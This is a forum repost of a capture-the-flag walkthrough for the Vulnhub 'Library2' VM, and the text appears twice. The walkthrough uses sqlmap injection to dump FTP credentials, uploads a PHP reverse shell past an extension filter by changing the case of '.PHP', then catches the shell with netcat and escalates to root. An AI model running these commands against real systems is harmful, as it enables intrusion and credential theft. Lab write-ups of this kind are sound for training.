densmukkedk
Social ROI Analyst
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1
300 XP
Today we are going to take another challenge Library2 which is a 2nd lab of the series Library. The credit for making this VM machine goes to “Avraham Cohen” and it is a boot2root challenge where we have to root the server to complete the challenge. You can download this VM here.
Security Level: Beginner
Penetrating Methodology:
Scanning
Enumeration
Exploitation
Privilege Escalation
Walkthrough:
Scanning:
Let’s start off with the scanning process. This target VM took the IP address of 192.168.1.107 automatically from our local Wi-Fi network.
We used Nmap for port scanning. We found that port 21 and 80 are open.
Enumeration:
As we can see port 80 is open, we opened the IP address in our browser, but we didn’t find anything useful on the webpage.
Firstly, we tried dirb in default mode but didn’t find any directory. Then we looked with .php extension and got one directory /library.php
After accessing the URL http://192.168.1.107/library.php we got a webpage listing the name of few countries.
We just clicked on Netherlands and it didn’t give any information.
We captured the request in burpsuite and thought country parameter might be vulnerable to SQL injection, so we copied the raw request of burp into a text file sql and used an asterisk (*) to pinpoint our point of the target but we didn’t get anything.
Then we took a little help of the hint given by the creator of this machine on Vulnhub and changed the request from GET to POST.
You can see in the image below the request has been changed from GET to POST. Copy this request in a text file on your attacking machine.
Exploitation:
Now let’s use sqlmap on the file where we have copied the POST request in a text file.
From the results, we found a directory named library.
Further enumerating the library database for usernames and passwords.
We found a username globus and password AroundTheWorld for the ftp service.
We connected to the target system through ftp using the above-found credentials. We looked here and there but couldn’t find anything useful, so what we did is we grabbed a php-reverse-shell from /usr/share/webshells/php and modified the listener IP as ours and named it as shell.php.
Then we tried to upload it in the target machine using PUT command but we got access denied error.
It seemed there was some sort of file format filtering happening in the backend, we found a work around for this filter by changing the name of the script file from shell.php to shell.PHP
Now we executed the shell by just browsing to the URL http://192.168.1.107/shell.PHP and at the same time started a netcat listener on our Kali machine.
Privilege Escalation:
We successfully got the netcat session with a limited user privilege. And after a little bit of directory traversing, we found the password of a root inside a file named welcome located in the /var/mail directory.
Then we finally switched to the root shell using su command and successfully completed the challenge.
Author: Auqib Wani is a Certified Ethical Hacker, Penetration Tester and a Tech Enthusiast with more than 5 years of experience in the field of Network & Cyber Security. Contact Here
Security Level: Beginner
Penetrating Methodology:
Scanning
- Netdiscover
- NMAP
Enumeration
- Web Directory Search
- Burpsuite
Exploitation
- Sqlmap
- FTP
- Shell Upload
- Netcat
Privilege Escalation
- Obtaining root password
Walkthrough:
Scanning:
Let’s start off with the scanning process. This target VM took the IP address of 192.168.1.107 automatically from our local Wi-Fi network.
We used Nmap for port scanning. We found that port 21 and 80 are open.
Code:
nmap -A 192.168.1.107Enumeration:
As we can see port 80 is open, we opened the IP address in our browser, but we didn’t find anything useful on the webpage.
Firstly, we tried dirb in default mode but didn’t find any directory. Then we looked with .php extension and got one directory /library.php
Code:
dirb http://192.168.1.107 -X .phpAfter accessing the URL http://192.168.1.107/library.php we got a webpage listing the name of few countries.
We just clicked on Netherlands and it didn’t give any information.
We captured the request in burpsuite and thought country parameter might be vulnerable to SQL injection, so we copied the raw request of burp into a text file sql and used an asterisk (*) to pinpoint our point of the target but we didn’t get anything.
Then we took a little help of the hint given by the creator of this machine on Vulnhub and changed the request from GET to POST.
You can see in the image below the request has been changed from GET to POST. Copy this request in a text file on your attacking machine.
Exploitation:
Now let’s use sqlmap on the file where we have copied the POST request in a text file.
Code:
sqlmap -r sql --dbs --batch --risk 3 --level 5From the results, we found a directory named library.
Further enumerating the library database for usernames and passwords.
Code:
sqlmap -r sql -D library --dump-all --batch --risk 3 --level 5We found a username globus and password AroundTheWorld for the ftp service.
We connected to the target system through ftp using the above-found credentials. We looked here and there but couldn’t find anything useful, so what we did is we grabbed a php-reverse-shell from /usr/share/webshells/php and modified the listener IP as ours and named it as shell.php.
Then we tried to upload it in the target machine using PUT command but we got access denied error.
Code:
ftp 192.168.1.107
ls
cd html
ls
put shell.phpIt seemed there was some sort of file format filtering happening in the backend, we found a work around for this filter by changing the name of the script file from shell.php to shell.PHP
Code:
put shell.PHP
ls
chmod 777 shell.PHPNow we executed the shell by just browsing to the URL http://192.168.1.107/shell.PHP and at the same time started a netcat listener on our Kali machine.
Privilege Escalation:
We successfully got the netcat session with a limited user privilege. And after a little bit of directory traversing, we found the password of a root inside a file named welcome located in the /var/mail directory.
Then we finally switched to the root shell using su command and successfully completed the challenge.
Code:
nc –lvp 1234
python -c 'import pty; pty.spawn("/bin/sh")'
cd /var/mail
ls
cat welcome
su root
idAuthor: Auqib Wani is a Certified Ethical Hacker, Penetration Tester and a Tech Enthusiast with more than 5 years of experience in the field of Network & Cyber Security. Contact Here